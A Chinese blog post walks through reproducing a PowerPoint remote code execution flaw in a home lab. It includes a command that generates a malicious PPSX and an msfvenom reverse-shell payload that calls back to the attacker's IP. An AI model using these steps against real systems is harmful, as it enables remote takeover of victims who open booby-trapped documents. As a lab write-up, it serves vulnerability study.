700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > Office CVE--8570 远程代码执行漏洞复现

Office CVE--8570 远程代码执行漏洞复现

时间:2021-10-24 10:49:21

相关推荐

Office CVE--8570 远程代码执行漏洞复现

最近在学习kali的相关使用,朋友说不如就复现cve--8570吧,我欣然答应。

0x00介绍

CVE--8570是一个逻辑漏洞,成因是Microsoft PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。***者可以诱导用户运行恶意PPT文件,便可获取和当前登陆用户相同的执行权限,该漏洞利用方法简单影响范围广。

0X01影响版本

Microsoft Office Service Pack 3

Microsoft Office Service Pack 2 (32-bit editions)

Microsoft Office Service Pack 2 (64-bit editions)

Microsoft Office RT Service Pack 1

Microsoft Office Service Pack 1 (32-bit editions)

Microsoft Office Service Pack 1 (64-bit editions)

Microsoft Office (32-bit edition)

Microsoft Office (64-bit edition)

0x02复现

***者

操作系统:kali

IP:192.168.40.22

受害者

操作系统:win7 x64(office )

IP:192.168.40.159

我们下载好利用的exp之后,解压打开里面的README.md。进入文件目录输入:cat README.md里面详细讲了操作步骤,讲真readme真的好用。如图:注意图中红框中的ip地址,均为***者的ip地址。

按照上图步骤进行第一步:生成恶意的PPSX文件

python cve--8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.40.22/logo.doc

第二步:生成反弹shell的exe文件,注意这里要是是64位系统,需要在windows后面加x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.40.22 LPORT=4444 -f exe > /var/www/html/shell.exe

第三步:开启msf的监听

第四步:生成监听来自ppsx执行反弹shell,自动开启80端口,注意这里的shell文件路径要和之前生成的文件路径一样。不过在进行这一步之前,我先将生成的Incoice.ppsx文件移到/var/www/html下,然后开启Apache服务,本机访问192.168.40.22/Incoice.ppsx,将恶意文件下载下来,随后关闭Apache服务。

此时这里已经可以看到received request for payload from 192.168.40.159,因为我是运行恶意文件之后截的图。受害者打开ppsx文件,即可看到成功反弹shell。期间失败过,shell反弹不了,第二天再试的时候就好了,具体原因就归类于自己粗心吧~~~

到此为止就已经成功复现该漏洞了。细心+不放弃=成功!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。